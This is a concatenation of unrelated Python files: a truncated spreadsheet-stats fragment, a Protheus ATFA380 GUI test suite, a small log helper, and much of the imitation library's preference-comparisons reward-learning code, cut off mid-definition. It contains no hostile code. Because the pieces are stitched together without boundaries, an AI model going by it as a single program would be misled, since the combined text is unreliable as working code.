int(self.datasheet.cell(2, 5).value) self.p1_data = {"wins": int(self.datasheet.cell(6, 5).value), "longest_win_streak": int(self.datasheet.cell(8, 5).value), "current_win_streak": int(self.datasheet.cell(9, 5).value)} self.p2_data = {"wins": int(self.datasheet.cell(6, 10).value), "longest_win_streak": int(self.datasheet.cell(8, 10).value), "current_win_streak": int(self.datasheet.cell(9, 10).value)}
from tir import Webapp import unittest class ATFA380(unittest.TestCase): @classmethod def setUpClass(inst): inst.oHelper = Webapp() inst.oHelper.Setup("SIGAATF", "01/04/2016", "T1", "M SP 01 ", "01") inst.oHelper.Program("ATFA380") def test_ATFA380_001(self): #INCLUI UM REGISTRO, OBS: A NUMERAÇÃO É AUTOMATICA. self.oHelper.SetButton("Incluir") self.oHelper.SetBranch("M SP 01 ") self.oHelper.SetButton("Avançar") self.oHelper.SetButton("Avançar") #Parâmetros de perguntes self.oHelper.SetValue("MV_PAR01","ATF11001", name_attr=True) #Bem de self.oHelper.SetValue("MV_PAR02","ATF11001", name_attr=True) #Bem até self.oHelper.SetValue("MV_PAR03","", name_attr=True) #Grupo de self.oHelper.SetValue("MV_PAR04","ZZZZ", name_attr=True) #Grupo até self.oHelper.SetValue("MV_PAR05","", name_attr=True) #Centro de Custo de self.oHelper.SetValue("MV_PAR06","ZZZZZZZZZ",name_attr=True) #Centro de Custo até self.oHelper.SetValue("MV_PAR07","101010200005",name_attr=True ) #Conta de self.oHelper.SetValue("MV_PAR08","101010200005",name_attr=True ) #Conta até self.oHelper.SetValue("MV_PAR11" , "" , name_attr=True ) #Item de self.oHelper.SetValue("MV_PAR12" , "ZZZZ" , name_attr=True ) #Item até self.oHelper.SetButton("Avançar") self.oHelper.SetValue("Simular", True) self.oHelper.SetButton("Finalizar") self.oHelper.CheckResult("NJ_ITEM","000001", grid=True, line=1)#NJ_ITEM self.oHelper.CheckResult("NJ_BEM","ATF11001 ", grid=True, line=1)#NJ_BEM self.oHelper.CheckResult("NJ_TIPO","01", grid=True, line=1)#NJ_TIPO self.oHelper.CheckResult("NJ_VLREC01","100,00", grid=True, line=1)#NJ_VLREC01 self.oHelper.CheckResult("NJ_VLTAX01","10,00", grid=True, line=1)#NJ_VLTAX01 self.oHelper.CheckResult("NJ_VLORI01","100,00", grid=True, line=1)#NJ_VLORI01 self.oHelper.CheckResult("NJ_TPDEPR","Linear", grid=True, line=1)#NJ_TPDEPR #Carrega a grid com as atualizações alteradas e/ou para checar self.oHelper.LoadGrid() self.oHelper.SetButton("Salvar") self.oHelper.SetButton("Cancelar") self.oHelper.AssertTrue() def test_ATFA380_002(self): process = '00000000000000000008' self.oHelper.SearchBrowse(f"M SP 01 {process}", "Filial+processo") self.oHelper.SetButton("Alterar") self.oHelper.SetButton("Avançar") self.oHelper.SetButton("Avançar") self.oHelper.SetButton("Avançar") self.oHelper.SetValue("Simular", True) self.oHelper.SetButton("Finalizar") self.oHelper.SetValue("Valor", "100,00", grid=True,row=1)#NJ_VLREC01 Valor self.oHelper.SetValue("Taxa", "99,00", grid=True,row=1)#NJ_VLTAX01 Taxa self.oHelper.SetValue("Venda","125,00", grid=True,row=1)#NJ_VLACMD01 Venda self.oHelper.LoadGrid() self.oHelper.CheckResult("NJ_VLREC01", "100,00", grid=True,line=1)#NJ_VLREC01 self.oHelper.CheckResult("NJ_VLTAX01", "99,00", grid=True,line=1)#NJ_VLTAX01 self.oHelper.CheckResult("NJ_VLVEN01", "125,00", grid=True,line=1)#NJ_VLVEN01 self.oHelper.LoadGrid() self.oHelper.SetButton("Salvar") self.oHelper.AssertTrue() def test_ATFA380_003(self): process = '00000000000000000007' self.oHelper.SearchBrowse(f"M SP 01 {process}", "Filial+processo") self.oHelper.SetButton("Visualizar") self.oHelper.SetButton("Avançar") self.oHelper.SetButton("Avançar") self.oHelper.SetButton("Avançar") self.oHelper.SetButton("Finalizar") self.oHelper.CheckResult("NJ_ITEM","000001", grid=True, line=1) self.oHelper.CheckResult("NJ_BEM","ATF11003", grid=True, line=1) self.oHelper.CheckResult("NJ_TIPO","01", grid=True, line=1) self.oHelper.CheckResult("NJ_VLREC01","50,00", grid=True, line=1) self.oHelper.CheckResult("NJ_VLTAX01","10,00", grid=True, line=1) self.oHelper.CheckResult("NJ_TPDEPR","Linear", grid=True, line=1) self.oHelper.CheckResult("NJ_VLORI01","100,00", grid=True, line=1) self.oHelper.LoadGrid() self.oHelper.SetButton("Confirmar") self.oHelper.AssertTrue() def test_ATFA380_004(self): process = '00000000000000000009' #Alteração de simulação de Redução ao valor recuperavel de um Ativo/bem self.oHelper.SearchBrowse(f"M SP 01 {process}", "Filial+processo") self.oHelper.SetButton("Outras ações", "Excluir") self.oHelper.SetButton("Avançar") self.oHelper.SetButton("Avançar") self.oHelper.SetButton("Avançar") self.oHelper.SetButton("Finalizar") self.oHelper.SetButton("Confirmar") self.oHelper.SearchBrowse(f"M SP 01 {process}", "Filial+processo") self.oHelper.SetButton("Visualizar") self.oHelper.SetButton("Avançar") self.oHelper.CheckResult("NI_PROC", process, name_attr=True) self.oHelper.SetButton("Avançar") self.oHelper.SetButton("Finalizar") self.oHelper.SetButton("Confirmar") self.oHelper.AssertFalse() def test_ATFA380_005(self): ##Efetivação de um registro de simulaçao de Redução ao Valor Recuperavel de um Ativo/Bem ##Parametros de ultima depreciação para poder efetivar o registro, use caso nao tenha feito na base manualmente, se não comente self.oHelper.AddParameter("MV_ULTDEPR","M SP 01","20160331","20160331","20160331") self.oHelper.SetParameters() process = '00000000000000000010' self.oHelper.SearchBrowse(f"M SP 01 {process}", "Filial+processo") self.oHelper.SetButton("Outras ações", "Efetivar") self.oHelper.SetButton("Avançar") self.oHelper.SetButton("Avançar") self.oHelper.SetButton("Avançar") self.oHelper.SetButton("Finalizar") self.oHelper.SetButton("Confirmar") self.oHelper.SearchBrowse(f"M SP 01 {process}", "Filial+processo") self.oHelper.SetButton("Visualizar") self.oHelper.SetButton("Avançar") self.oHelper.CheckResult("NI_STATUS", "2 - Efetivação",grid=False) self.oHelper.SetButton("Avançar") self.oHelper.SetButton("Finalizar") self.oHelper.SetButton("Confirmar") self.oHelper.AssertTrue() self.oHelper.RestoreParameters() def test_ATFA380_006(self): #Validar Helps ##Validação de Helps de um registro de efetivação ja efetuada e nem que pode ser excluida pois ja foi efetuada. process = '00000000000000000010' #mudar depois na base congelada o registro self.oHelper.SearchBrowse(f"M SP 01 {process}", "Filial+processo") self.oHelper.SetButton("Outras ações", "Efetivar") self.oHelper.SetButton("OK") self.oHelper.SetButton("Outras ações", "Excluir") self.oHelper.SetButton("OK") self.oHelper.AssertTrue() def test_ATFA380_007(self): process = '00000000000000000010' self.oHelper.SearchBrowse(f"M SP 01 {process}", "Filial+processo") self.oHelper.SetButton("Outras ações", "Exportar") self.oHelper.SetButton("Avançar") self.oHelper.SetButton("Avançar") #### self.oHelper.SetValue("MV_PAR01","ATF380EXPORT",grid=False) self.oHelper.SetValue("MV_PAR02","\\spool\\") #self.oHelper.SetValue("MV_PAR02",r"C:\ProtheusT\\Base_congeladaSistemico\\exports\\",) ###Aguardando retorno para #self.oHelper.SetFilePath(r"C:\\ProtheusT\\Base_congeladaSistemico\\exports\\") ### #### self.oHelper.SetButton("Finalizar") self.oHelper.SetButton("Confirmar") self.oHelper.CheckView("Exportacao gerada com sucesso",element_type=help) self.oHelper.SetButton("Ok") self.oHelper.AssertTrue() def test_ATFA380_008(self): #INCLUI UM REGISTRO efetivado, mesmos registros do de inclusao de simulação 001 self.oHelper.SetButton("Incluir") self.oHelper.SetBranch("M SP 01 ") self.oHelper.SetButton("Avançar") self.oHelper.SetButton("Avançar") self.oHelper.SetValue("MV_PAR01","ATF11001", name_attr=True) #Bem de self.oHelper.SetValue("MV_PAR02","ATF11001", name_attr=True) #Bem até self.oHelper.SetValue("MV_PAR03","", name_attr=True) #Grupo de self.oHelper.SetValue("MV_PAR04","ZZZZ", name_attr=True) #Grupo até self.oHelper.SetValue("MV_PAR05","", name_attr=True) #Centro de Custo de self.oHelper.SetValue("MV_PAR06","ZZZZZZZZZ",name_attr=True) #Centro de Custo até self.oHelper.SetValue("MV_PAR07","101010200005",name_attr=True ) #Conta de self.oHelper.SetValue("MV_PAR08","101010200005",name_attr=True ) #Conta até self.oHelper.SetValue("MV_PAR11" , "" , name_attr=True ) #Item de self.oHelper.SetValue("MV_PAR12" , "ZZZZ" , name_attr=True ) #Item até self.oHelper.SetButton("Avançar") self.oHelper.SetValue("Simular", False) self.oHelper.SetButton("Finalizar") self.oHelper.CheckResult("NJ_ITEM","000001", grid=True, line=1)#NJ_ITEM self.oHelper.CheckResult("NJ_BEM","ATF11001 ", grid=True, line=1)#NJ_BEM self.oHelper.CheckResult("NJ_TIPO","01", grid=True, line=1)#NJ_TIPO self.oHelper.CheckResult("NJ_VLREC01","100,00", grid=True, line=1)#NJ_VLREC01 self.oHelper.CheckResult("NJ_VLTAX01","10,00", grid=True, line=1)#NJ_VLTAX01 self.oHelper.CheckResult("NJ_VLORI01","100,00", grid=True, line=1)#NJ_VLORI01 self.oHelper.CheckResult("NJ_TPDEPR","Linear", grid=True, line=1)#NJ_TPDEPR self.oHelper.LoadGrid() self.oHelper.SetButton("Salvar") self.oHelper.SetButton("Cancelar") self.oHelper.AssertTrue() @classmethod def tearDownClass(inst): inst.oHelper.TearDown() if __name__ == '__main__': unittest.main()
import datetime def log ( message ) : print(f"[ LOG ] status : {message} --> {datetime.datetime.now().strftime('%H:%M:%S')}")
"""Learning reward models using preference comparisons. Trains a reward model and optionally a policy based on preferences between trajectory fragments. """ import abc import math import pickle import random from typing import Any, Callable, List, Mapping, Optional, Sequence, Tuple, Union import numpy as np import torch as th from scipy import special from stable_baselines3.common import base_class, vec_env from imitation.algorithms import base from imitation.data import rollout, types, wrappers from imitation.data.types import ( AnyPath, TrajectoryPair, TrajectoryWithRew, TrajectoryWithRewPair, Transitions, ) from imitation.policies import exploration_wrapper from imitation.rewards import common as rewards_common from imitation.rewards import reward_nets, reward_wrapper from imitation.util import logger as imit_logger from imitation.util import networks class TrajectoryGenerator(abc.ABC): """Generator of trajectories with optional training logic.""" _logger: imit_logger.HierarchicalLogger """Object to log statistics and natural language messages to.""" def __init__(self, custom_logger: Optional[imit_logger.HierarchicalLogger] = None): """Builds TrajectoryGenerator. Args: custom_logger: Where to log to; if None (default), creates a new logger. """ self.logger = custom_logger or imit_logger.configure() @abc.abstractmethod def sample(self, steps: int) -> Sequence[TrajectoryWithRew]: """Sample a batch of trajectories. Args: steps: All trajectories taken together should have at least this many steps. Returns: A list of sampled trajectories with rewards (which should be the environment rewards, not ones from a reward model). """ # noqa: DAR202 def train(self, steps: int, **kwargs): """Train an agent if the trajectory generator uses one. By default, this method does nothing and doesn't need to be overridden in subclasses that don't require training. Args: steps: number of environment steps to train for. **kwargs: additional keyword arguments to pass on to the training procedure. """ @property def logger(self) -> imit_logger.HierarchicalLogger: return self._logger @logger.setter def logger(self, value: imit_logger.HierarchicalLogger): self._logger = value class TrajectoryDataset(TrajectoryGenerator): """A fixed dataset of trajectories.""" def __init__( self, trajectories: Sequence[TrajectoryWithRew], seed: Optional[int] = None, custom_logger: Optional[imit_logger.HierarchicalLogger] = None, ): """Creates a dataset loaded from `path`. Args: trajectories: the dataset of rollouts. seed: Seed for RNG used for shuffling dataset. custom_logger: Where to log to; if None (default), creates a new logger. """ super().__init__(custom_logger=custom_logger) self._trajectories = trajectories self.rng = random.Random(seed) def sample(self, steps: int) -> Sequence[TrajectoryWithRew]: # make a copy before shuffling trajectories = list(self._trajectories) self.rng.shuffle(trajectories) return _get_trajectories(trajectories, steps) class AgentTrainer(TrajectoryGenerator): """Wrapper for training an SB3 algorithm on an arbitrary reward function.""" def __init__( self, algorithm: base_class.BaseAlgorithm, reward_fn: Union[rewards_common.RewardFn, reward_nets.RewardNet], exploration_frac: float = 0.0, switch_prob: float = 0.5, random_prob: float = 0.5, seed: Optional[int] = None, custom_logger: Optional[imit_logger.HierarchicalLogger] = None, ): """Initialize the agent trainer. Args: algorithm: the stable-baselines algorithm to use for training. Its environment must be set. reward_fn: either a RewardFn or a RewardNet instance that will supply the rewards used for training the agent. exploration_frac: fraction of the trajectories that will be generated partially randomly rather than only by the agent when sampling. switch_prob: the probability of switching the current policy at each step for the exploratory samples. random_prob: the probability of picking the random policy when switching during exploration. seed: random seed for exploratory trajectories. custom_logger: Where to log to; if None (default), creates a new logger. Raises: ValueError: `algorithm` does not have an environment set. """ self.algorithm = algorithm # NOTE: this has to come after setting self.algorithm because super().__init__ # will set self.logger, which also sets the logger for the algorithm super().__init__(custom_logger) if isinstance(reward_fn, reward_nets.RewardNet): reward_fn = reward_fn.predict self.reward_fn = reward_fn self.exploration_frac = exploration_frac venv = self.algorithm.get_env() if not isinstance(venv, vec_env.VecEnv): raise ValueError("The environment for the agent algorithm must be set.") # The BufferingWrapper records all trajectories, so we can return # them after training. This should come first (before the wrapper that # changes the reward function), so that we return the original environment # rewards. self.buffering_wrapper = wrappers.BufferingWrapper(venv) self.venv = reward_wrapper.RewardVecEnvWrapper( self.buffering_wrapper, self.reward_fn, ) self.log_callback = self.venv.make_log_callback() self.algorithm.set_env(self.venv) policy = rollout._policy_to_callable( self.algorithm, self.venv, deterministic_policy=True, ) self.exploration_wrapper = exploration_wrapper.ExplorationWrapper( policy=policy, venv=self.venv, random_prob=random_prob, switch_prob=switch_prob, seed=seed, ) def train(self, steps: int, **kwargs) -> None: """Train the agent using the reward function specified during instantiation. Args: steps: number of environment timesteps to train for **kwargs: other keyword arguments to pass to BaseAlgorithm.train() Raises: RuntimeError: Transitions left in `self.buffering_wrapper`; call `self.sample` first to clear them. """ n_transitions = self.buffering_wrapper.n_transitions if n_transitions: raise RuntimeError( f"There are {n_transitions} transitions left in the buffer. " "Call AgentTrainer.sample() first to clear them.", ) self.algorithm.learn( total_timesteps=steps, reset_num_timesteps=False, callback=self.log_callback, **kwargs, ) def sample(self, steps: int) -> Sequence[types.TrajectoryWithRew]: agent_trajs, _ = self.buffering_wrapper.pop_finished_trajectories() # We typically have more trajectories than are needed. # In that case, we use the final trajectories because # they are the ones with the most relevant version of # the agent. # The easiest way to do this will be to first invert the # list and then later just take the first trajectories: agent_trajs = agent_trajs[::-1] avail_steps = sum(len(traj) for traj in agent_trajs) exploration_steps = int(self.exploration_frac * steps) if self.exploration_frac > 0 and exploration_steps == 0: self.logger.warn( "No exploration steps included: exploration_frac = " f"{self.exploration_frac} > 0 but steps={steps} is too small.", ) agent_steps = steps - exploration_steps if avail_steps < agent_steps: self.logger.log( f"Requested {agent_steps} transitions but only {avail_steps} in buffer." f" Sampling {agent_steps - avail_steps} additional transitions.", ) sample_until = rollout.make_sample_until( min_timesteps=agent_steps - avail_steps, min_episodes=None, ) # Important note: we don't want to use the trajectories returned # here because 1) they might miss initial timesteps taken by the RL agent # and 2) their rewards are the ones provided by the reward model! # Instead, we collect the trajectories using the BufferingWrapper. rollout.generate_trajectories( self.algorithm, self.venv, sample_until=sample_until, ) additional_trajs, _ = self.buffering_wrapper.pop_finished_trajectories() agent_trajs = list(agent_trajs) + list(additional_trajs) agent_trajs = _get_trajectories(agent_trajs, agent_steps) exploration_trajs = [] if exploration_steps > 0: self.logger.log(f"Sampling {exploration_steps} exploratory transitions.") sample_until = rollout.make_sample_until( min_timesteps=exploration_steps, min_episodes=None, ) rollout.generate_trajectories( policy=self.exploration_wrapper, venv=self.venv, sample_until=sample_until, ) exploration_trajs, _ = self.buffering_wrapper.pop_finished_trajectories() exploration_trajs = _get_trajectories(exploration_trajs, exploration_steps) # We call _get_trajectories separately on agent_trajs and exploration_trajs # and then just concatenate. This could mean we return slightly too many # transitions, but it gets the proportion of exploratory and agent transitions # roughly right. return list(agent_trajs) + list(exploration_trajs) @TrajectoryGenerator.logger.setter def logger(self, value: imit_logger.HierarchicalLogger): self._logger = value self.algorithm.set_logger(self.logger) def _get_trajectories( trajectories: Sequence[TrajectoryWithRew], steps: int, ) -> Sequence[TrajectoryWithRew]: """Get enough trajectories to have at least `steps` transitions in total.""" if steps == 0: return [] available_steps = sum(len(traj) for traj in trajectories) if available_steps < steps: raise RuntimeError( f"Asked for {steps} transitions but only {available_steps} available", ) # We need the cumulative sum of trajectory lengths # to determine how many trajectories to return: steps_cumsum = np.cumsum([len(traj) for traj in trajectories]) # Now we find the first index that gives us enough # total steps: idx = (steps_cumsum >= steps).argmax() # we need to include the element at position idx trajectories = trajectories[: idx + 1] # sanity check assert sum(len(traj) for traj in trajectories) >= steps return trajectories class Fragmenter(abc.ABC): """Class for creating pairs of trajectory fragments from a set of trajectories.""" def __init__(self, custom_logger: Optional[imit_logger.HierarchicalLogger] = None): """Initialize the fragmenter. Args: custom_logger: Where to log to; if None (default), creates a new logger. """ self.logger = custom_logger or imit_logger.configure() @abc.abstractmethod def __call__( self, trajectories: Sequence[TrajectoryWithRew], fragment_length: int, num_pairs: int, ) -> Sequence[TrajectoryWithRewPair]: """Create fragment pairs out of a sequence of trajectories. Args: trajectories: collection of trajectories that will be split up into fragments fragment_length: the length of each sampled fragment num_pairs: the number of fragment pairs to sample Returns: a sequence of fragment pairs """ # noqa: DAR202 class RandomFragmenter(Fragmenter): """Sample fragments of trajectories uniformly at random with replacement. Note that each fragment is part of a single episode and has a fixed length. This leads to a bias: transitions at the beginning and at the end of episodes are less likely to occur as part of fragments (this affects the first and last fragment_length transitions). An additional bias is that trajectories shorter than the desired fragment length are never used. """ def __init__( self, seed: Optional[float] = None, warning_threshold: int = 10, custom_logger: Optional[imit_logger.HierarchicalLogger] = None, ): """Initialize the fragmenter. Args: seed: an optional seed for the internal RNG warning_threshold: give a warning if the number of available transitions is less than this many times the number of required samples. Set to 0 to disable this warning. custom_logger: Where to log to; if None (default), creates a new logger. """ super().__init__(custom_logger) self.rng = random.Random(seed) self.warning_threshold = warning_threshold def __call__( self, trajectories: Sequence[TrajectoryWithRew], fragment_length: int, num_pairs: int, ) -> Sequence[TrajectoryWithRewPair]: fragments: List[TrajectoryWithRew] = [] prev_num_trajectories = len(trajectories) # filter out all trajectories that are too short trajectories = [traj for traj in trajectories if len(traj) >= fragment_length] if len(trajectories) == 0: raise ValueError( "No trajectories are long enough for the desired fragment length " f"of {fragment_length}.", ) num_discarded = prev_num_trajectories - len(trajectories) if num_discarded: self.logger.log( f"Discarded {num_discarded} out of {prev_num_trajectories} " "trajectories because they are shorter than the desired length " f"of {fragment_length}.", ) weights = [len(traj) for traj in trajectories] # number of transitions that will be contained in the fragments num_transitions = 2 * num_pairs * fragment_length if sum(weights) < num_transitions: self.logger.warn( "Fewer transitions available than needed for desired number " "of fragment pairs. Some transitions will appear multiple times.", ) elif ( self.warning_threshold and sum(weights) < self.warning_threshold * num_transitions ): # If the number of available transitions is not much larger # than the number of requires ones, we already give a warning. # But only if self.warning_threshold is non-zero. self.logger.warn( f"Samples will contain {num_transitions} transitions in total " f"and only {sum(weights)} are available. " f"Because we sample with replacement, a significant number " "of transitions are likely to appear multiple times.", ) # we need two fragments for each comparison for _ in range(2 * num_pairs): traj = self.rng.choices(trajectories, weights, k=1)[0] n = len(traj) start = self.rng.randint(0, n - fragment_length) end = start + fragment_length terminal = (end == n) and traj.terminal fragment = TrajectoryWithRew( obs=traj.obs[start : end + 1], acts=traj.acts[start:end], infos=traj.infos[start:end] if traj.infos is not None else None, rews=traj.rews[start:end], terminal=terminal, ) fragments.append(fragment) # fragments is currently a list of single fragments. We want to pair up # fragments to get a list of (fragment1, fragment2) tuples. To do so, # we create a single iterator of the list and zip it with itself: iterator = iter(fragments) return list(zip(iterator, iterator)) class PreferenceGatherer(abc.ABC): """Base class for gathering preference comparisons between trajectory fragments.""" def __init__( self, seed: Optional[int] = None, custom_logger: Optional[imit_logger.HierarchicalLogger] = None, ): """Initializes the preference gatherer. Args: seed: seed for the internal RNG, if applicable custom_logger: Where to log to; if None (default), creates a new logger. """ # The random seed isn't used here, but it's useful to have this # as an argument nevertheless because that means we can always # pass in a seed in training scripts (without worrying about whether # the PreferenceGatherer we use needs one). del seed self.logger = custom_logger or imit_logger.configure() @abc.abstractmethod def __call__(self, fragment_pairs: Sequence[TrajectoryWithRewPair]) -> np.ndarray: """Gathers the probabilities that fragment 1 is preferred in `fragment_pairs`. Args: fragment_pairs: sequence of pairs of trajectory fragments Returns: A numpy array with shape (b, ), where b is the length of the input (i.e. batch size). Each item in the array is the probability that fragment 1 is preferred over fragment 2 for the corresponding pair of fragments. Note that for human feedback, these probabilities are simply 0 or 1 (or 0.5 in case of indifference), but synthetic models may yield other probabilities. """ # noqa: DAR202 class SyntheticGatherer(PreferenceGatherer): """Computes synthetic preferences using ground-truth environment rewards.""" def __init__( self, temperature: float = 1, discount_factor: float = 1, sample: bool = True, seed: Optional[int] = None, threshold: float = 50, custom_logger: Optional[imit_logger.HierarchicalLogger] = None, ): """Initialize the synthetic preference gatherer. Args: temperature: the preferences are sampled from a softmax, this is the temperature used for sampling. temperature=0 leads to deterministic results (for equal rewards, 0.5 will be returned). discount_factor: discount factor that is used to compute how good a fragment is. Default is to use undiscounted sums of rewards (as in the DRLHP paper). sample: if True (default), the preferences are 0 or 1, sampled from a Bernoulli distribution (or 0.5 in the case of ties with zero temperature). If False, then the underlying Bernoulli probabilities are returned instead. seed: seed for the internal RNG (only used if temperature > 0 and sample) threshold: preferences are sampled from a softmax of returns. To avoid overflows, we clip differences in returns that are above this threshold (after multiplying with temperature). This threshold is therefore in logspace. The default value of 50 means that probabilities below 2e-22 are rounded up to 2e-22. custom_logger: Where to log to; if None (default), creates a new logger. """ super().__init__(custom_logger=custom_logger) self.temperature = temperature self.discount_factor = discount_factor self.sample = sample self.rng = np.random.default_rng(seed=seed) self.threshold = threshold def __call__(self, fragment_pairs: Sequence[TrajectoryWithRewPair]) -> np.ndarray: """Computes probability fragment 1 is preferred over fragment 2.""" returns1, returns2 = self._reward_sums(fragment_pairs) if self.temperature == 0: return (np.sign(returns1 - returns2) + 1) / 2 returns1 /= self.temperature returns2 /= self.temperature # clip the returns to avoid overflows in the softmax below returns_diff = np.clip(returns2 - returns1, -self.threshold, self.threshold) # Instead of computing exp(rews1) / (exp(rews1) + exp(rews2)) directly, # we divide enumerator and denominator by exp(rews1) to prevent overflows: model_probs = 1 / (1 + np.exp(returns_diff)) # Compute the mean binary entropy. This metric helps estimate # how good we can expect the performance of the learned reward # model to be at predicting preferences. entropy = -( special.xlogy(model_probs, model_probs) + special.xlogy(1 - model_probs, 1 - model_probs) ).mean() self.logger.record("entropy", entropy) if self.sample: return self.rng.binomial(n=1, p=model_probs).astype(np.float32) return model_probs def _reward_sums(self, fragment_pairs) -> Tuple[np.ndarray, np.ndarray]: rews1, rews2 = zip( *[ ( rollout.discounted_sum(f1.rews, self.discount_factor), rollout.discounted_sum(f2.rews, self.discount_factor), ) for f1, f2 in fragment_pairs ], ) return np.array(rews1, dtype=np.float32), np.array(rews2, dtype=np.float32) class PreferenceDataset(th.utils.data.Dataset): """A PyTorch Dataset for preference comparisons. Each item is a tuple consisting of two trajectory fragments and a probability that fragment 1 is preferred over fragment 2. This dataset is meant to be generated piece by piece during the training process, which is why data can be added via the .push() method. """ def __init__(self): """Builds an empty PreferenceDataset.""" self.fragments1: List[TrajectoryWithRew] = [] self.fragments2: List[TrajectoryWithRew] = [] self.preferences = np.array([]) def push( self, fragments: Sequence[TrajectoryWithRewPair], preferences: np.ndarray, ): """Add more samples to the dataset. Args: fragments: list of pairs of trajectory fragments to add preferences: corresponding preference probabilities (probability that fragment 1 is preferred over fragment 2) Raises: ValueError: `preferences` shape does not match `fragments` or has non-float32 dtype. """ fragments1, fragments2 = zip(*fragments) if preferences.shape != (len(fragments),): raise ValueError( f"Unexpected preferences shape {preferences.shape}, " f"expected {(len(fragments), )}", ) if preferences.dtype != np.float32: raise ValueError("preferences should have dtype float32") self.fragments1.extend(fragments1) self.fragments2.extend(fragments2) self.preferences = np.concatenate((self.preferences, preferences)) def __getitem__(self, i) -> Tuple[TrajectoryWithRewPair, float]: return (self.fragments1[i], self.fragments2[i]), self.preferences[i] def __len__(self) -> int: assert len(self.fragments1) == len(self.fragments2) == len(self.preferences) return len(self.fragments1) def save(self, path: AnyPath) -> None: with open(path, "wb") as file: pickle.dump(self, file) @staticmethod def load(path: AnyPath) -> "PreferenceDataset": with open(path, "rb") as file: return pickle.load(file) def preference_collate_fn( batch: Sequence[Tuple[TrajectoryWithRewPair, float]], ) -> Tuple[Sequence[TrajectoryWithRewPair], np.ndarray]: fragment_pairs, preferences = zip(*batch) return list(fragment_pairs), np.array(preferences) class RewardTrainer(abc.ABC): """Abstract base class for training reward models using preference comparisons. This class contains only the actual reward model training code, it is not responsible for gathering trajectories and preferences or for agent training (see PreferenceComparisons for that). """ def __init__( self, model: reward_nets.RewardNet, custom_logger: Optional[imit_logger.HierarchicalLogger] = None, ): """Initialize the reward trainer. Args: model: the RewardNet instance to be trained custom_logger: Where to log to; if None (default), creates a new logger. """ self.model = model self.logger = custom_logger or imit_logger.configure() def train(self, dataset: PreferenceDataset, epoch_multiplier: float = 1.0): """Train the reward model on a batch of fragment pairs and preferences. Args: dataset: the dataset of preference comparisons to train on. epoch_multiplier: how much longer to train for than usual (measured relatively). """ with networks.training(self.model): self._train(dataset, epoch_multiplier) @abc.abstractmethod def _train(self, dataset: PreferenceDataset, epoch_multiplier: float): """Train the reward model; see ``train`` for details.""" class CrossEntropyRewardTrainer(RewardTrainer): """Train a reward model using a cross entropy loss.""" def __init__( self, model: reward_nets.RewardNet, noise_prob: float = 0.0, batch_size: int = 32, epochs: int = 1, lr: float = 1e-3, discount_factor: float = 1.0, threshold: float = 50, weight_decay: float = 0.0, custom_logger: Optional[imit_logger.HierarchicalLogger] = None, ): """Initialize the reward model trainer. Args: model: the RewardNet instance to be trained noise_prob: assumed probability with which the preference is uniformly random (used for the model of preference generation that is used for the loss) batch_size: number of fragment pairs per batch epochs: number of epochs on each training iteration (can be adjusted on the fly by specifying an `epoch_multiplier` in `self.train()` if longer training is desired in specific cases). lr: the learning rate discount_factor: the model of preference generation uses a softmax of returns as the probability that a fragment is preferred. This is the discount factor used to calculate those returns. Default is 1, i.e. undiscounted sums of rewards (which is what the DRLHP paper uses). threshold: the preference model used to compute the loss contains a softmax of returns. To avoid overflows, we clip differences in returns that are above this threshold. This threshold is therefore in logspace. The default value of 50 means that probabilities below 2e-22 are rounded up to 2e-22. weight_decay: the weight decay factor for the reward model's weights to use with ``th.optim.AdamW``. This is similar to but not equivalent to L2 regularization, see https://arxiv.org/abs/1711.05101 custom_logger: Where to log to; if None (default), creates a new logger. """ super().__init__(model, custom_logger) self.noise_prob = noise_prob self.batch_size = batch_size self.epochs = epochs self.discount_factor = discount_factor self.threshold = threshold self.optim = th.optim.AdamW( self.model.parameters(), lr=lr, weight_decay=weight_decay, ) def _loss( self, fragment_pairs: Sequence[TrajectoryPair], preferences: np.ndarray, ) -> th.Tensor: """Computes the loss. Args: fragment_pairs: Batch consisting of pairs of trajectory fragments. preferences: The probability that the first fragment is preferred over the second. Typically 0, 1 or 0.5 (tie). Returns: The cross-entropy loss between the probability predicted by the reward model and the target probabilities in `preferences`. """ probs = th.empty(len(fragment_pairs), dtype=th.float32) for i, fragment in enumerate(fragment_pairs): frag1, frag2 = fragment trans1 = rollout.flatten_trajectories([frag1]) trans2 = rollout.flatten_trajectories([frag2]) rews1 = self._rewards(trans1) rews2 = self._rewards(trans2) probs[i] = self._probability(rews1, rews2) # TODO(ejnnr): Here and below, > 0.5 is problematic # because getting exactly 0.5 is actually somewhat # common in some environments (as long as sample=False or temperature=0). # In a sense that "only" creates class imbalance # but it's still misleading. predictions = (probs > 0.5).float() preferences_th = th.as_tensor(preferences, dtype=th.float32) ground_truth = (preferences_th > 0.5).float() accuracy = (predictions == ground_truth).float().mean() self.logger.record("accuracy", accuracy.item()) return th.nn.functional.binary_cross_entropy(probs, preferences_th) def _rewards(self, transitions: Transitions) -> th.Tensor: preprocessed = self.model.preprocess( state=transitions.obs, action=transitions.acts, next_state=transitions.next_obs, done=transitions.dones, ) return self.model(*preprocessed) def _probability(self, rews1: th.Tensor, rews2: th.Tensor) -> th.Tensor: """Computes the Boltzmann rational probability that the first trajectory is best. Args: rews1: A 1-dimensional array of rewards for the first trajectory fragment. rews2: A 1-dimensional array of rewards for the second trajectory fragment. Returns: The softmax of the difference between the (discounted) return of the first and second trajectory. """ assert rews1.ndim == rews2.ndim == 1 # First, we compute the difference of the returns of # the two fragments. We have a special case for a discount # factor of 1 to avoid unnecessary computation (especially # since this is the default setting). if self.discount_factor == 1: returns_diff = (rews2 - rews1).sum() else: discounts = self.discount_factor ** th.arange(len(rews1)) returns_diff = (discounts * (rews2 - rews1)).sum() # Clip to avoid overflows (which in particular may occur # in the backwards pass even if they do not in the forward pass). returns_diff = th.clip(returns_diff, -self.threshold, self.threshold) # We take the softmax of the returns. model_probability # is the first dimension of that softmax, representing the # probability that fragment 1 is preferred. model_probability = 1 / (1 + returns_diff.exp()) return self.noise_prob * 0.5 + (1 - self.noise_prob) * model_probability def _train(self, dataset: PreferenceDataset, epoch_multiplier: float = 1.0): """Trains for `epoch_multiplier * self.epochs` epochs over `dataset`.""" # TODO(ejnnr): This isn't specific to the loss function or probability model. # In general, it might be best to split the probability model, the loss and # the optimization procedure a bit more cleanly so that different versions # can be combined dataloader = th.utils.data.DataLoader( dataset, batch_size=self.batch_size, shuffle=True, collate_fn=preference_collate_fn, ) epochs = round(self.epochs * epoch_multiplier) for _ in range(epochs): for fragment_pairs, preferences in dataloader: self.optim.zero_grad() loss = self._loss(fragment_pairs, preferences) loss.backward() self.optim.step() self.logger.record("loss", loss.item()) class 